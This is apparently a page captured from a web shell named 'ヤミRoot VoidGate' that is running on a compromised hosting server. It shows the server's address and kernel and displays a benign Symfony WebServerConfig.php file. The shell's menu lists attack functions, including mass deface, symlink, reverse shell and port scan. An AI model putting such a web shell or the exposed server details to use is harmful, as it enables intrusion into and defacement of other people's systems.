ヤミRoot VoidGate
User / IP
:
216.73.216.33
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
symfony
/
symfony
/
src
/
Symfony
/
Bundle
/
WebServerBundle
/
Viewing: WebServerConfig.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Bundle\WebServerBundle; /** * @author Fabien Potencier <fabien@symfony.com> */ class WebServerConfig { private $hostname; private $port; private $documentRoot; private $env; private $router; public function __construct($documentRoot, $env, $address = null, $router = null) { if (!is_dir($documentRoot)) { throw new \InvalidArgumentException(sprintf('The document root directory "%s" does not exist.', $documentRoot)); } if (null === $file = $this->findFrontController($documentRoot, $env)) { throw new \InvalidArgumentException(sprintf('Unable to find the front controller under "%s" (none of these files exist: %s).', $documentRoot, implode(', ', $this->getFrontControllerFileNames($env)))); } $_ENV['APP_FRONT_CONTROLLER'] = $file; $this->documentRoot = $documentRoot; $this->env = $env; if (null !== $router) { $absoluteRouterPath = realpath($router); if (false === $absoluteRouterPath) { throw new \InvalidArgumentException(sprintf('Router script "%s" does not exist.', $router)); } $this->router = $absoluteRouterPath; } else { $this->router = __DIR__.'/Resources/router.php'; } if (null === $address) { $this->hostname = '127.0.0.1'; $this->port = $this->findBestPort(); } elseif (false !== $pos = strrpos($address, ':')) { $this->hostname = substr($address, 0, $pos); if ('*' === $this->hostname) { $this->hostname = '0.0.0.0'; } $this->port = substr($address, $pos + 1); } elseif (ctype_digit($address)) { $this->hostname = '127.0.0.1'; $this->port = $address; } else { $this->hostname = $address; $this->port = $this->findBestPort(); } if (!ctype_digit($this->port)) { throw new \InvalidArgumentException(sprintf('Port "%s" is not valid.', $this->port)); } } public function getDocumentRoot() { return $this->documentRoot; } public function getEnv() { return $this->env; } public function getRouter() { return $this->router; } public function getHostname() { return $this->hostname; } public function getPort() { return $this->port; } public function getAddress() { return $this->hostname.':'.$this->port; } private function findFrontController($documentRoot, $env) { $fileNames = $this->getFrontControllerFileNames($env); foreach ($fileNames as $fileName) { if (file_exists($documentRoot.'/'.$fileName)) { return $fileName; } } } private function getFrontControllerFileNames($env) { return array('app_'.$env.'.php', 'app.php', 'index_'.$env.'.php', 'index.php'); } private function findBestPort() { $port = 8000; while (false !== $fp = @fsockopen($this->hostname, $port, $errno, $errstr, 1)) { fclose($fp); if ($port++ >= 8100) { throw new \RuntimeException('Unable to find a port available to run the web server.'); } } return $port; } }
Coded With 💗 by
0x6ick